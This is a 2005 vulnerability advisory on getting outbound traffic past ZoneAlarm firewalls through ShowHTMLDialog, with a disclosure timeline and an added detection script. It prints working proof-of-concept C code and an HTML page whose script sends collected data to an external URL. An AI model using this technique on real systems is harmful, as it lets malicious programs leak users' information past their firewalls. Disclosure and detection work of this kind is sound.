The information has been provided by Debasis Mohanty.
The original article can be found at: http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
* Zone Alarm Pro version 6.0.x
* Zone Alarm Internet Security Suite version 6.0.x
* Zone Alarm Firewall with Anti-Spyware version 6.1.x
* Zone Alarm Firewall with Anti-Virus version 6.0.x
* Zone Alarm Firewall (Free Version) version 6.0.x
By using the ShowHTMLDialog() method, any malicious program can create a modal dialog box that displays HTML, which in turn can be used to redirect the page to the attacker's site. It was observed that when this method is used, ZA Pro and Internet Security Suite are unable to block the resulting internet access. Any malicious program can therefore use it to send data out to the attacker via HTTP and, at the same time, receive command instructions from the attacker.
On successful exploitation, the malicious program will be able to send the victim's details and personal system information to the attacker, which can further lead to complete system compromise.
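// Declarations used by the calls below (SHOWHTMLDIALOGFN is declared in mshtmhst.h)
SHOWHTMLDIALOGFN* pfnShowHTMLDialog;
IMoniker* pURLMoniker = NULL;
HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
// Look up ShowHTMLDialog; GetProcAddress takes an ANSI name, so TEXT() must not be used here
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML, "ShowHTMLDialog");
// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
CreateURLMoniker(NULL, bstrURL, &pURLMoniker);
// Open a Modal Dialog box of HTML content type
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
/* Eof */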
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<title>Redirection Dialog</title>
<!-- Here goes the information logged by the malicious program which will
be sent to the evil site via http request -->
<script>
var sTargetURL = "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[YourInformation Here]";
window.location.href = sTargetURL;
</script>
</head>
</html>
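A detection-side view of the technique above, as an added example that is not part of the original advisory: the PoC loads MSHTML.DLL into its own process, so a process outside the expected browser hosts that loads mshtml.dll and then opens outbound connections deserves review. The event layout (modelled on Sysmon image-load ID 7 and network-connection ID 3), the allowlist, the function names and all sample values are constructed assumptions.

```python
import ntpath

# Assumption: processes expected to host the MSHTML engine; tune per environment.
EXPECTED_HOSTS = {"iexplore.exe", "hh.exe"}

# Constructed events modelled on Sysmon: id 7 = image loaded, id 3 = network connection.
SAMPLE_EVENTS = [
    {"id": 7, "t": 100, "pid": 412, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "loaded": r"C:\Windows\System32\mshtml.dll"},
    {"id": 3, "t": 101, "pid": 412, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "dest": "192.0.2.10", "port": 80},
    {"id": 3, "t": 190, "pid": 1337, "image": r"C:\Users\alice\AppData\Local\Temp\report.exe",
     "dest": "198.51.100.7", "port": 443},
    {"id": 7, "t": 200, "pid": 1337, "image": r"C:\Users\alice\AppData\Local\Temp\report.exe",
     "loaded": r"C:\WINDOWS\system32\MSHTML.DLL"},
    {"id": 3, "t": 201, "pid": 1337, "image": r"C:\Users\alice\AppData\Local\Temp\report.exe",
     "dest": "203.0.113.5", "port": 80},
    {"id": 7, "t": 300, "pid": 1500, "image": r"C:\Tools\viewer.exe",
     "loaded": r"C:\Windows\System32\mshtml.dll"},
]


def unexpected_mshtml_hosts(events, expected=EXPECTED_HOSTS):
    """Return {(pid, exe): record} for processes outside `expected` that loaded
    mshtml.dll, with the connections each made after the load."""
    hits = {}
    for ev in sorted(events, key=lambda e: e["t"]):
        exe = ntpath.basename(ev["image"]).lower()
        key = (ev["pid"], exe)  # pid plus image name tolerates pid reuse
        if ev["id"] == 7:
            dll = ntpath.basename(ev["loaded"]).lower()
            if dll == "mshtml.dll" and exe not in expected:
                hits.setdefault(key, {"image": ev["image"], "loaded_at": ev["t"],
                                      "destinations": []})
        elif ev["id"] == 3 and key in hits:
            hits[key]["destinations"].append((ev["dest"], ev["port"]))
    return hits


def triage(hits):
    """Order findings: hosts that also talked to the network come first."""
    return sorted(hits, key=lambda k: (not hits[k]["destinations"], hits[k]["loaded_at"]))


if __name__ == "__main__":
    found = unexpected_mshtml_hosts(SAMPLE_EVENTS)
    for key in triage(found):
        print(key, found[key]["destinations"] or "no outbound connections seen")
```

Connections a process made before it loaded mshtml.dll are deliberately left out, so the destinations listed are only those that could have come from the hosted HTML engine.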
10th Oct, 2005 - Bug Originally Discovered
15th Oct, 2005 - Vendor Reported
15th Oct, 2005 - Vendor acknowledged the report
17th Oct, 2005 - Vendor asked for more information
19th Oct, 2005 - Vendor provided with more information and the version info on which the exploit was tested.
29th Oct, 2005 - Final follow up with the vendor but no response
8th Nov, 2005 - Public Disclosure